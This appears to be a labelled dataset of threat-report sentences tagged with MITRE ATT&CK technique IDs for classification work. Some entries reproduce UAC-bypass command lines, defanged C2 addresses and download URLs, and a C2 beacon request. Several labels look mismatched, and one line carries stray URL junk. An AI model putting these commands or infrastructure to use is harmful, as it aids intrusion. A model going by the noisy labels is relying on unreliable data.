{"text1":"Revenge RAT is a simple and freely available Remote Access Trojan that automatically gathers system information before allowing threat actors to remotely access system components such as webcams, microphones, and various other utilities","labels":"['T1082']"}
{"text1":"itwm= ags= oe= aq= btnG= oprnd= itwm= utm= channel= The XAgent OSX Trojan generates a system specific value that it refers to as an \u201cagent_id\u201d, which is a unique identifier for each compromised host","labels":"['T1082']"}
{"text1":"The value is derived using the IOService to access the IOPlatformUUID property, which is equivalent to the \u201cHardware UUID\u201d listed in the system information application, as seen in the Figure 3 screenshot of our analysis system","labels":"['T1082']"}
{"text1":"The Trojan uses the first four bytes of this hardware ID as a unique identifier for the system, which in our case was \u201c0000\u201d","labels":"['T1082']"}
{"text1":"The payload sends system information about the infected computer to the C&C server and downloads additional tools.","labels":"['T1082']"}
{"text1":"If it is successful then it will send out basic host information and await further commands.","labels":"['T1082']"}
{"text1":"After decoding their C2 server IP addresses, from obfuscated strings, both trojans will attempt to collect host information and send it to the C2 server.","labels":"['T1082']"}
{"text1":"Operating system's name (i.e., the name of the machine) Operating system's OS architecture Operating system's caption Computer system's domain Computer system's username Computer's public IP address","labels":"['T1082']"}
{"text1":"Once successfully installed in a system, Trickbot will gather system information such as OS, CPU, and memory information, user accounts, lists of installed programs and services.","labels":"['T1082']"}
{"text1":"(To bypass UAC) configurable setting for the process to abuse  Other than these, new coding algorithm has been introduced","labels":"['T1548.002']"}
{"text1":"This request is followed by a call to \u201cGetisrunasAbById\u201d to determine if the Trojan should use \u201crunas\u201d to execute the downloaded executable with elevated privileges, which would display the UAC dialog for the user to click","labels":"['T1548.002']"}
{"text1":"The CAB file contains the following files and functions:  dll: A malicious DLL used to launch batch files (used with cliconfg.exe for UAC bypass)","labels":"['T1548.002']"}
{"text1":"The macro then extracts the CAB file into %systemroo%\\system32, using either wusa.exe or expand.exe (depending on the OS) to again bypass UAC prompts Once the files have been extracted, the Visual Basic macro deletes the CAB file and runs the malicious NTWDBLIB.dll via cliconfg.exe (to gain privileges and bypass UAC protections) Command lines used by the Visual Basic macro:  cmd \/c wusa %TEMP%\\setup.cab \/quiet \/extract:%SystemRoot%\\System32 && del \/f \/q %TEMP%\\setup.cab && cliconfg.exe cmd \/c expand %TEMP%\\setup.cab -F:* %SystemRoot%\\System32 && del \/f \/q %TEMP%\\setup.cab && cliconfg.exe A combination of NTWDBLIB.dll and cliconfg.exe are used to bypass UAC protections; this is a familiar attack on Windows","labels":"['T1548.002']"}
{"text1":"The key differences in this variant:  Two CAB files are encoded into the Word document in text boxes instead of being appended in the DOC file There is one CAB file for an x86 system and another for an x64 system This malware sample uses uacme.exe with dummy.dll to implement the UAC bypass  exe is the program vulnerable to the UAC bypass attack dll runs install.bat to set up the service (same as NTWDBLIB.dll)   exe and dummy.dll may be either 64-bit or 32-bit binaries based on the OS","labels":"['T1548.002']"}
{"text1":"Its encoding method has been modified from time to time, aligned with major upgrade of PlugX itself","labels":"['T1124']"}
{"text1":"Campaign Code and Compile Time Correlation In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code","labels":"['T1124']"}
{"text1":"These four were then all modified on the same date and time on October 13, 2018 08:21","labels":"['T1124']"}
{"text1":"A possible explanation for this is that the document was copied to another system with an incorrectly set system time, then saved with the incorrect time","labels":"['T1124']"}
{"text1":"When the backdoor establishes a connection to the command and control server, it sets the request period time equal to the specified dwell time for the standby mode","labels":"['T1124']"}
{"text1":"If the dwell time value for the active mode has been set, but the package has not been received, the dwell time value is incremented by the dwell time value for the active period","labels":"['T1124']"}
{"text1":"This action is repeated until the dwell time value is bigger or equal to the dwell time value for the standby mode","labels":"['T1124']"}
{"text1":"Timezone Check The Trojan check to see if the system is configured (\u201cDaylightName\u201d) with one of the following time zones: \u00a0 Arabic Daylight Time (UTC+3) Arab Daylight Time (UTC+3) Arabian Daylight Time (UTC+4) Middle East Daylight Time (UTC+2) Iran Daylight Time (UTC+3.5)   Human Interaction Check Before executing its functional code, the Trojan presents a dialog box with the following line of code: \u00a0 Interaction.MsgBox(encodedStringClass.return_user32_bogus_errorcode_(3), MsgBoxStyle.Critical, null); \u00a0 This dialog box displays \u00a0An error occurred while processing user32.dll!, which the user must click the ok button for the Trojan to run its functional code","labels":"['T1124']"}
{"text1":"Figure 3 Countries in which OopsIE will run in based on the time zone Notable Differences The OopsIE Trojan delivered in this attack had functional code that was very similar to the OopsIE variant discussed in our previous blog","labels":"['T1124']"}
{"text1":"In another case the attackers use another code snippet borrowed from the SubTee GitHub project, this time filling in a fully templated .NET application whitelist bypass file: SHA256: 3e9136f95fa55852993cd15b82fe6ec54f78f34584f7689b512a46f0a22907f2: This time the attacker didn\u2019t have to write any of their own code, instead they were simply able to paste their shellcode directly into a template, in order to launch PlugX as a child process of a trusted application","labels":"['T1124']"}
{"text1":"Watches uninstall time, checks time diff (local time vs internet time)","labels":"['T1124']"}
{"text1":"Here\u2019s a python code to decode","labels":"['T1140']"}
{"text1":"It then downloads and decrypts a PNG file","labels":"['T1140']"}
{"text1":"The state command sets a global variable containing a series of Boolean values represented as ASCII values \u20180\u2019 or \u20181\u2019 and also adds itself to the configuration file","labels":"['T1140']"}
{"text1":"Figure 11 Embedded BMP file containing encrypted string data RC4 is used to decrypt this data using a 16-byte key that is stored within the BMP file at offset 0x502","labels":"['T1140']"}
{"text1":"Once decrypted, we are provided with a large list of strings, as seen below (note that the data has been truncated for brevity):  Figure 12 Decrypted strings from embedded BMP file After these strings are decrypted, the malware will load a series of Microsoft Windows API calls to be used later on","labels":"['T1140']"}
{"text1":"In order to decode this data, Comnie first decodes it using base64 with the following non-standard alphabet (note that it is simply the original alphabet in reverse): \/+9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA \u00a0 The resulting data is then parsed and decrypted using RC4","labels":"['T1140']"}
{"text1":"This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence","labels":"['T1140']"}
{"text1":"Its purpose is to load Msadoz<n>.dll in order to decrypt and execute it in memory","labels":"['T1140']"}
{"text1":"If after the package has been decoded its size is bigger than 3 bytes, the Trojan decrypts its first 11 bytes with XOR using the method similar to the one described above","labels":"['T1140']"}
{"text1":"The decrypted code resolves the necessary API functions, decompresses the embedded PE file with RtlCompressBuffer() using LZNT1 and maps it into memory","labels":"['T1140']"}
{"text1":"Configuration Decryption:  Another small, but same important function in the photo above, is the function for decrypting the data containing the C&C configuration","labels":"['T1140']"}
{"text1":"Figure 2 \u2013 The GitHub profile for F0R3X containing both legitimate forked code and the binaries created by the attacker","labels":"['T1140']"}
{"text1":"It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks","labels":"['T1140']"}
{"text1":"Packet::getData decrypts the received payload and Converter::outString descrambles the result","labels":"['T1140']"}
{"text1":"In the event this is successful the malware will use the following path to store any dropped files:  %COMMONPROGRAMFILES%\\services\\  In the event it is not successful, this alternative path will be used instead:  %APPDATA%\\microsoft\\mmc\\  It proceeds to load and decrypt and embedded bitmap resource file","labels":"['T1140']"}
{"text1":"In the event this is successful, the malware will use the following path to store any dropped files:  %COMMONPROGRAMFILES%\\services\\  In the event it is not successful, this alternative path will be used instead:  %APPDATA%\\microsoft\\mmc\\  Reaver.v2 proceeds to decrypt an embedded file using a simple XOR obfuscation routine","labels":"['T1140']"}
{"text1":"ESET\u2019s analysis of a recent backdoor used by TeleBots \u2013 the group behind the massive NotPetya ransomware outbreak \u2013 uncovers strong code similarities to the Industroyer main backdoor, revealing a rumored connection that was not previously proven The post New TeleBots backdoor: First evidence linking Industroyer to NotPetya appeared first on WeLiveSecurity","labels":"['T1140']"}
{"text1":"The following code snippet was used to decode strings within OopsIE:out = \"\" for e in obfuscated_string.split(\"-\"):    out += chr(int(e)-1)When first run, this OopsIE variant runs a variety of checks to avoid running in an analysis environment, as discussed in the previous section","labels":"['T1140']"}
{"text1":"This exception invokes the exception handler containing the HTTP communication code, allowing it to run","labels":"['T1140']"}
{"text1":"Figure 1 \u2013 The main code from the .NET wrapper, with the Shellcode array being created and executed in a new thread","labels":"['T1140']"}
{"text1":"The first shellcode decrypts a further shellcode block","labels":"['T1140']"}
{"text1":"After decrypting the strings, they must be further decompressed using LZNT1","labels":"['T1140']"}
{"text1":"It then reads and decrypts the content between these values to yield an IP address as shown below:       ---- BEGIN SSH2 PUBLIC KEY ----Comment: \"rsa-key\"AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt\/WknQK9CDLWubpgknZ0HIHSd8uV\/TJvLsRkjpV+U\/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv\/mJjQ9Lv3BdNiM3\/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps8wD4f0NBUtDdEdXhWp3nxv\/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q\/oxLXTrpeJ6AHyLyeUaBha3q9niJ=---- END SSH2 PUBLIC KEY ----     A Python script to decode strings encrypted with this technique is given in Appendix B \u2013 Python Scripts","labels":"['T1140']"}
{"text1":"Interestingly, the delivery document borrowed a technique which was publicized in late 2017 as being used by the Sofacy threat actors, embedding the main malicious code in a EXIF metadata property of the document","labels":"['T1140']"}
{"text1":"The main function of the Trojan interacts with its configured C2 server to obtain additional code to execute","labels":"['T1140']"}
{"text1":"The main function gets pertinent strings to communicate with its C2 by calling a sub-function with a specific number that the sub-function uses as a case within a switch statement to decrypt the desired string","labels":"['T1140']"}
{"text1":"We believe the actor used a cryptor on the payload, as it obtains a filename and script from within its resources and decodes these resources by multiplying each byte by negative one","labels":"['T1140']"}
{"text1":"\u201cKnock\u201d also appears in several strings inside the code of SpeakUp","labels":"['T1140']"}
{"text1":"It maintains both code and data in the raw, encrypted blobs of data to be decrypted and used at runtime, and hidden functionality that isn\u2019t exposed until runtime","labels":"['T1140']"}
{"text1":"In total, 29 unique CARROTBAT samples have been identified to date, containing a total of 12 confirmed unique decoy documents","labels":"['T1140']"}
{"text1":"In this particular instance, the payload is encoded via base64, which certutil decodes","labels":"['T1140']"}
{"text1":"The following function written in Python may be used to decode this file:def decode(data): \tout = \"\" \tc = 0 \tfor d in data: \t\tout += chr(ord(d)^c) \t\tc+=1 \treturn outOnce decoded it is discovered that this instance of OceanSalt attempts to communicate with 61.14.210[.]72 on port 7117","labels":"['T1140']"}
{"text1":"The following code example shows the false flag being set (5 > 115) and the ETransaksi.diomadnfagaghagh method being called: \u00a0int num = 5; int num2 = 155; bool flag = num > num2; if (flag) {     <legitimate Sales System Application code>     }            else {     NewLateBinding.LateCall(ETransaksi.diomadnfagaghagh(), null, \"Invoke\", new object[]     {         null,         new object[0]     }, null, null, null, true);The payload uses this technique to run a chain of methods that eventually carry out its malicious task","labels":"['T1140']"}
{"text1":"(Source: Dell SecureWorks) Both the redirect code on the compromised site and the exploit code appear and disappear, indicating that the adversaries add the code when they want to leverage the SWC and remove the code when it is not in use to limit the visibility of their operations","labels":"['T1140']"}
{"text1":"The backdoor will load the encrypted configuration file and decrypt it, then use Secure Sockets Layer (SSL) protocol to connect to command-and-control (C&C) servers","labels":"['T1140']"}
{"text1":"The image and table below illustrate TClient\u2019s encrypted configuration that we decrypted (via Python code):  Figure 10","labels":"['T1140']"}
{"text1":"Decrypted backdoor configuration Reverse analysis of TClient allowed us to determine how to decrypt the C&C information","labels":"['T1140']"}
{"text1":"Further collaboration between FireEye as a Service (FaaS), Mandiant and FireEye iSIGHT intelligence uncovered additional victims worldwide, a new suite of tools and novel techniques","labels":"['T1543', 'T1543.003']"}
{"text1":"In addition, web traffic between a service provider\u2019s customer and a service provider is likely to be viewed as benign by network defenders at the customer, allowing the attacker to exfiltrate data stealthily","labels":"['T1543', 'T1543.003']"}
{"text1":"These parameters install it as a service","labels":"['T1543', 'T1543.003']"}
{"text1":"The malware operates on victims\u2019 systems as a svchost-based service and is capable of downloading executables, changing its own configuration, updating its own binaries, terminating its own processes, and activating and terminating denial-of-service attacks","labels":"['T1543', 'T1543.003']"}
{"text1":"The malicious DLL is not a service DLL because it lacks ServiceMain()","labels":"['T1543', 'T1543.003']"}
{"text1":"The victims Data from Cadelle\u2019s C&C servers shows that a large number of Backdoor.Cadelspy infections affected individual users of Iranian internet service providers (ISPs) and hosting services","labels":"['T1543', 'T1543.003']"}
{"text1":"The document brought Talos a new gift - a new version of ROKRAT","labels":"['T1543', 'T1543.003']"}
{"text1":"It downloads the file to the infected machine from the input URL using BITSAdmin, and is called every time the script attempts to download a file","labels":"['T1105']"}
{"text1":"The directory creation.\u00a0 Downloading the Payloads The remote XSL script downloads twelve files from the C2 server that masquerade themselves as JPEG, GIF, and extensionless files","labels":"['T1105']"}
{"text1":"A thorough explanation of what information is collected can be found in a breakdown by Cofense from late 2018.\u00a0  The script verifies all parts of the malware have been downloaded.\u00a0 After downloading the payload, the XSL script checks to make sure every piece of the malware was downloaded.\u00a0  One of the twelve download commands as detected by the Cybereason platform in same variant of Astaroth.\u00a0  The twelve downloaded files","labels":"['T1105']"}
{"text1":"Displayed below are these new, xml formatted plugin names \u201cweap_hwi\u201d, \u201cps\u201d, and \u201cvsnet\u201d in a BlackEnergy configuration file download from a c2 server","labels":"['T1105']"}
{"text1":"One of the discovered config files contained a URL with an as yet unidentified md5: hxxps:\/\/46.165.222(dot)28\/upgrade\/bf0dac805798cc1f633f19ce8ed6382f\/upgrade.php Victim set #4 A set of victims discovered\u00a0installed Siemens SCADA software in their ICS environment was responsible for downloading and executing BlackEnergy","labels":"['T1105']"}
{"text1":"HighShell v5.0 explorer tab allows actor to navigate the file system The HighShell v7.1 variant from the data dump contains similar functionality to its predecessors and continued the tabular approach but expanded even further by splitting out the main functionality across multiple tabs, specifically \u201cCommand\u201d, \u201cExplorer\u201d, \u201cUpload\u201d, \u201cDownload\u201d, \u201cSql Server\u201d and \u201cChange Time\u201d","labels":"['T1105']"}
{"text1":"Network Downloader The Network Downloader functionality allows the actor to quickly upload user files from remote victim systems","labels":"['T1105']"}
{"text1":"The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&C server","labels":"['T1105']"}
{"text1":"Symantec determined a more accurate picture of Buckeye\u2019s targets by looking at where Buckeye remained active on the network longer than a day, deployed additional tools, and spread onto multiple computers","labels":"['T1105']"}
{"text1":"The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download\/upload jobs, mostly to update the OS itself","labels":"['T1105']"}
{"text1":"It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files","labels":"['T1105']"}
{"text1":"In this case, after the payload is delivered via an exploit the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account","labels":"['T1105']"}
{"text1":"Upon execution, the initialized file downloads multiple malicious payloads from remote servers","labels":"['T1105']"}
{"text1":"Figure 4 Microsoft Word attempting to download the remote template If the C2 server is active at the time the document is opened, it will successfully retrieve the malicious macro and load it in the same Microsoft Word session","labels":"['T1105']"}
{"text1":"If the C2 server is not active at this time, the download will fail and the victim will not receive a prompt to Enable Content as no macro is downloaded","labels":"['T1105']"}
{"text1":"attachedTemplate.dotm xxx 11\/15\/18 05:35 11\/15\/18 05:35 109.248.148[.]42    Table 2 Remote templates downloaded by Dear Joohn delivery documents As seen in Table 1, the delivery documents accessed their respective remote templates from four C2 servers at the following IP addresses:  185.203.118[.]198 145.249.105[.]165 188.241.58[.]170\u00a0 109.248.148[.]42  These initial C2 IP addresses not only hosted the remote templates that subsequently load the first-stage Zebrocy or Cannon payloads, but the IP addresses also hosted the C2 server for the first-stage payloads themselves","labels":"['T1105']"}
{"text1":"The POSHSPY backdoor is designed to download and execute additional PowerShell code and Windows binaries","labels":"['T1105']"}
{"text1":"The RAT, however, had a multitude of functionalities (as listed in the table below) such as to download and execute, compress, encrypt, upload, search directories, etc","labels":"['T1105']"}
{"text1":"The link provided in the malicious email led to a fake\u00a0VPN Web Portal:  Upon logging in with the credentials provided in the email, the victim is presented with the following page:  The victim is asked to install the \u201cVPN Client\u201d (an .exe file), or, if download fails, to download a password protected zip (with the same .exe file inside)","labels":"['T1105']"}
{"text1":"This document was alleged to have been written by the Ministry of Reunification as demonstrated by the logo in the top left.Similar to the \"Golden Time\" campaign, this document exploits an EPS vulnerability in order to download and execute shellcode located on a compromised website:hxxp:\/\/60chicken[.]co[.]kr\/wysiwyg\/PEG_temp\/logo1.pngThe fake image usage is a common pattern for this group","labels":"['T1105']"}
{"text1":"The macro contains malicious code that attempts to download content from a remote server","labels":"['T1105']"}
{"text1":"!DWN  Downloads a file from a specified URL","labels":"['T1105']"}
{"text1":"The IRC variant of MPK has a command set (Table 2) that makes this an effective backdoor Trojan, specifically allowing the actors to steal credentials from the targeted system via keylogging, to navigate and interact with the file system, to run arbitrary commands, and to download and execute additional tools on the system","labels":"['T1105']"}
{"text1":"The DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3)","labels":"['T1105']"}
{"text1":"Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4)","labels":"['T1105']"}
{"text1":"Figure 8 shows the network communication of the Pause.ps1 download","labels":"['T1105']"}
{"text1":"I download my tools from GitHub, and so do my victims","labels":"['T1105']"}
{"text1":"The \u201cupload\u201d command downloads files from the CnC and saves them locally in \u201cC:\\ProgramData\u201c","labels":"['T1105']"}
{"text1":"Additional information In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers\u2019 arsenal but also some OPSEC mistakes made by the attackers","labels":"['T1105']"}
{"text1":"It will:  Download and execute the backdoor component Replace the content of the downloader Mach-O executable with a decoy, either using a base64-encoded embedded file or by downloading it from the internet Open a decoy document (described later) Close the Terminal window that just opened  The decoy document replaces the downloader Mach-O file, which means the malicious executable is only present in the ZIP file now","labels":"['T1105']"}
{"text1":"This file issued a GET request to download a malicious file from: hxxp:\/\/94.23.172.164\/dupdatechecker.doc","labels":"['T1105']"}
{"text1":"The .iqy files take advantage of Excel\u2019s willingness to download and include the contents from a remote server in a spreadsheet","labels":"['T1105']"}
{"text1":"Once the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes","labels":"['T1105']"}
{"text1":"13 Copy file to adbFle.tmp, and upload it to the C2","labels":"['T1105']"}
{"text1":"Both responses instruct the malware to download and load a remote plugin","labels":"['T1105']"}
{"text1":"During a file analysis of PLAINTEE in WildFire, we observed the attackers download and execute a plugin during the runtime for that sample","labels":"['T1105']"}
{"text1":"The purpose is to download and execute an additional payload hosted on a compromised website: NavRAT","labels":"['T1105']"}
{"text1":"NavRAT is able to download and execute files located in the attachment of a received email","labels":"['T1105']"}
{"text1":"Figure 2 SYSCON network traffic witnessed during execution \u00a0 Pivoting on the domain hosting the SYSCON sample, 881.000webhostapp[.]com, revealed a number of additional samples, including a sample of the KONNI malware family, and four 64-bit executable files belonging to the CARROTBAT malware family","labels":"['T1105']"}
{"text1":"CARROTBAT itself is a dropper that allows an attacker to drop and open an embedded decoy file, followed by the execution of a command that will download and run a payload on the targeted machine","labels":"['T1105']"}
{"text1":"Delivery document The delivery document contains a macro that downloads an executable from a remote server","labels":"['T1105']"}
{"text1":"Command_Down_exec: This command downloads and executes new modules.\u00a0 It takes a url as the argument and uses that to download and execute files","labels":"['T1105']"}
{"text1":"Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes","labels":"['T1105']"}
{"text1":"After reestablishing access, the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used","labels":"['T1105']"}
{"text1":"The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries","labels":"['T1105']"}
{"text1":"The script self-scheduling, as well as the scheduling of a script that repeatedly attempts to download and execute the Revenge RAT binary, significantly contribute to the persistence of this infection","labels":"['T1105']"}
{"text1":"We found a mechanism for decrypting, executing, and downloading an additional payload from the C&C server.","labels":"['T1105']"}
{"text1":"certutil is a WIndows component that can download external content to the computer. In a typical attack, the criminals follow this paradigm","labels":"['T1105']"}
{"text1":"The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables","labels":"['T1105']"}
{"text1":"The backdoor has the capability to download and upload files, execute shell commands, and update its configuration.","labels":"['T1105']"}
{"text1":"BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it","labels":"['T1574.001']"}
{"text1":"This most likely means there is some type of DLL hijacking going on by distributing a legitimate McAfee binary with MirageFox to load up the DLL properly into a legitimate looking process","labels":"['T1574.001']"}
{"text1":"Whitefly has consistently used a technique known as search order hijacking to run Vcrodat.","labels":"['T1574.001']"}
{"text1":"Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it.","labels":"['T1574.001']"}
{"text1":"Nibatad is also a loader that leverages search order hijacking, and downloads an encrypted payload to the infected computer.","labels":"['T1574.001']"}
{"text1":"We mentioned earlier that due to the nature of the IE injection technique used by the HTTP-based backdoors, a number of C2 commands were cached to disk","labels":"['T1071']"}
{"text1":"And, according to the collected config files, the group upgraded their malware communications\u00a0from plain text http to encrypted https in\u00a0October 2013","labels":"['T1071']"}
{"text1":"Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it   Figure 2: Configuration file that adds TCP tunnels and records desktop video Command and Control CARBANAK communicates to its C2 servers via pseudo-HTTP or a custom binary protocol","labels":"['T1071']"}
{"text1":"The example C2s used by older variants of Comnie demonstrates this:  Figure 9 Old Comnie variants collecting C2 information Please refer to the Appendix for a script that may be used to decode C2 information from the older Comnie variants","labels":"['T1071']"}
{"text1":"The URIs used in the HTTP requests are randomly generated","labels":"['T1071']"}
{"text1":"Table 2 Sandbox evasion checks in the C# variant of RogueRobin Like the original version, the C# variant of RogueRobin uses DNS tunneling to communicate with its C2 server using a variety of different DNS query types","labels":"['T1071']"}
{"text1":"Figure 2 Code that issues DNS query to gogle.co if a debugger is detected All DNS requests issued by RogueRobin use the built in nslookup.exe application to communicate to the C2 server and the Trojan will use a variety of regular expressions to extract data from the DNS response","labels":"['T1071']"}
{"text1":"Character  Digit   h 0   i 1   j 2   k 3   l 4   m 5   n 6   o 7   p 8   q 9    Table 4 Character substitution used in RogueRobin The Trojan will use future DNS requests to retrieve jobs from the C2 server, which the Trojan will handle as commands","labels":"['T1071']"}
{"text1":"The x_mode command is disabled by default, but when enabled via a command received from the DNS tunneling channel, it allows RogueRobin to receive a unique identifier and to get jobs by using Google Drive API requests","labels":"['T1071']"}
{"text1":"Background From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE, a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control (C2) server","labels":"['T1071']"}
{"text1":"Similar to RIPTIDE and HIGHTIDE, the WATERSPOUT backdoor is an HTTP-based backdoor that communicates with its C2 server","labels":"['T1071']"}
{"text1":"11\/1\/18 sahro.bella7 trala.cosh2 Bishtr.cam47 Lobrek.chizh Cervot.woprov    Table 5 Gathered C# Cannon samples As mentioned in our initial blog, the actor controlled email address acting as the C2 was sahro.bella7[at]post.cz, but all previous samples of Cannon used sym777.g[at]post.cz","labels":"['T1071']"}
{"text1":"Even though Delphi Cannon uses POP3S and SMTPS for its C2 communications like Cannon, it is arguably easier to defend against as it uses an actor owned domain that defenders can easily block and not a legitimate email provider such as Seznam","labels":"['T1071']"}
{"text1":"The screenshot in Figure 8 of the inf method within a Cannon sample (SHA256: 4405cfbf28\u2026) shows the information gathered that is exfiltrated to the C2 via email, specifically with RunningPlace and LogicalDrives header strings:  Figure 8 inf method used by Cannon When comparing the two Cannon variants, we found a method within a Delphi Cannon sample (SHA256: 5a02d4e5f6\u2026) showing the use of Running place and Logical_Drivers as header strings to the system information it is collecting and sending to the C2 via email","labels":"['T1071']"}
{"text1":"The shellcode retrieves an additional payload by connecting to the following C2 server using DNS: aaa.stage.14919005.www1.proslr3[.]com Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode","labels":"['T1071']"}
{"text1":"Retriever uses .NET web services and the SoapHttpClientProtocol class to communicate with its C2 server, which generates HTTP requests resembling the example request in Figure 4","labels":"['T1071']"}
{"text1":"The shellcode executed by this command is the same as in the delivery documents as well, specifically taken from Metasploit to obtain additional shellcode to execute using an HTTP request to the following URL: http:\/\/www7.chrome-up[.]date\/0m5EE We are unsure of the shellcode hosted at this URL, as we were unable to coerce the C2 server to provide a payload","labels":"['T1071']"}
{"text1":"Once these variables are set, the malware uses the SoapHttpClientProtocol class to communicate with its C2 server, which issues an HTTP POST requests that appears as:  As you can see from the above request, the SoapHttpClientProtocol class neatly structures data into an HTTP POST request","labels":"['T1071']"}
{"text1":"Table 3: FELIXROOT backdoor parameters  Cryptography All data is transferred to C2 servers using AES encryption and the IbindCtx COM interface using HTTP or HTTPS protocol","labels":"['T1071']"}
{"text1":"http:\/\/www.cankayasrc[.]com\/style\/js\/main.php http:\/\/ektamservis[.]com\/includes\/main.php http:\/\/gtme[.]ae\/font-awesome\/css\/main.php  Recommendations for organizations Effective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via solutions and training, allowing an organization to control any activities on their network or suspicious files on user systems","labels":"['T1071']"}
{"text1":"This information can then be transmitted to the attacker using protocols such as FTP, HTTP, and SMTP","labels":"['T1071']"}
{"text1":"tfvn[.]com[.]vnshirkeswitch[.]netguideofgeorgia[.]orggulfclouds[.]sitejhssourcingltd[.]comkamagra4uk[.]compioneerfitting[.]compositronicsindia[.]comscseguros[.]ptspldernet[.]comtoshioco[.]comwww[.]happytohelpyou[.]inIP addressesThe following IP addresses have been observed to be associated with malware campaigns.112.213.89[.]4067.23.254[.]6162.212.33[.]98153.92.5[.]124185.117.22[.]19723.94.188[.]24667.23.254[.]17072.52.150[.]218148.66.136[.]62107.180.24[.]253108.179.246[.]13818.221.35[.]21494.46.15[.]20066.23.237[.]18672.52.150[.]218URLs:The following URLs have been observed to be associated with malware campaigns.https[:]\/\/a[.]pomf[.]cat\/http[:]\/\/pomf[.]cat\/upload[.]php","labels":"['T1071']"}
{"text1":"The initial DNS query sent by the payload to obtain the system specific identifier uses the following structure, which includes the current process identifier (PID) as the subdomain of the C2 domain: <current process id>.<c2 domain> The C2 server will provide the system specific identifier within the answer portion of the DNS response","labels":"['T1071']"}
{"text1":"This command will automatically set the DNS type to use for actual C2   $showconfig Uploads the current configuration of the payload to the C2   slpx:\\d+ Sets the sleep interval between outbound DNS requests   $fileUpload Downloads contents from the C2 server and writes them to a specified file    Table 3 Commands available to payload Campaign Analysis The following domains are configured within the payload to be used as C2s","labels":"['T1071']"}
{"text1":"If that HTTPS request is not successful, the downloader will issue an HTTP request","labels":"['T1071']"}
{"text1":"Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish communications","labels":"['T1071']"}
{"text1":"The payload will construct a message that has the following structure that it will then send to the C2: \u00a0 bye<char uuid[35]>d \u00a0 The message above is sent via a simple HTTPS\/HTTP POST request to the C2 server","labels":"['T1071']"}
{"text1":"As seen in the above request, the Trojan will generate a URL for its beacon with the following structure:http:\/\/<c2 domain>\/chk?<hex(Environment.UserName\/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run","labels":"['T1071']"}
{"text1":"[1]\u00a0https:\/\/www.clearskysec.com\/report-the-copykittens-are-targeting-israelis\/ [2]\u00a0https:\/\/www.clearskysec.com\/copykitten-jpost\/","labels":"['T1071']"}
{"text1":"After the C2 information has been collected, BADNEWS leverages HTTP for communication with the remote servers","labels":"['T1071']"}
{"text1":"33 Download specified file to %TEMP%\\up and execute it in a new process    \u00a0 During C2 communications, BADNEWS will communicate to the C2 previously identified via HTTP","labels":"['T1071']"}
{"text1":"Exfiltrate data using HTTP over HTTP over AES over XOR, or any combination of the available transports","labels":"['T1071']"}
{"text1":"Deep Discovery Inspector protects customers from these threats via this DDI Rule:  DDI Rule 18 : DNS response of a queried malware Command and Control domain DDI Rule 15 : Many unsuccessful logon attempts (nbt_scan.exe) DDI Rule 38 : Multiple unsuccessful logon attempts (nbt_scan.exe)  TippingPoint customers are protected from these threats via these ThreatDV filters:  27218: HTTP: TROJ_RATANKBA_A Checkin 28219: HTTP: TROJ_RATANKBA_A Checkin 02 27220: HTTPS: TROJ_RATANKBA_A Checkin 27221: HTTP: Sundown EK Flash Exploit (SWF_EXPLOYT.YYRQ)  A list of related Indicators of Compromise (IoCs) can be found in this appendix","labels":"['T1071']"}
{"text1":"IcedCoffee is a fairly basic backdoor which uses WMI to collect a variety of system and user information from the system, which is then encoded with base64, encrypted with RC4 and submitted via HTTP POST to the C2 server","labels":"['T1071']"}
{"text1":"It then calls the subfunction with the argument of 2 to get the string that it will use as the HTTP POST request","labels":"['T1071']"}
{"text1":"The resulting HTTP POST request looks like the following: POST http:\/\/185.25.50[.]93\/syshelp\/kd8812u\/protocol.php HTTP\/1.1 Host: 185.25.50[.]93 Content-Type: application\/x-www-form-urlencoded Content-Length: 21 porg=44908AE0524f422d We have not seen a C2 server respond to our requests during our analysis, however, we do know how the Trojan will parse the C2\u2019s response for specific data","labels":"['T1071']"}
{"text1":"Victim Registration SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C which is the compromised website of speakupomaha[.]com","labels":"['T1071']"}
{"text1":"It uses the legitimate Naver email platform in order to communicate with the attackers via email","labels":"['T1071']"}
{"text1":"Command & Control  The malware communicates with the Naver email platform in order to communicate with the operator","labels":"['T1071']"}
{"text1":"It communicates with ftp.bytehost31[.]org via FTP for command and control (C2)","labels":"['T1071']"}
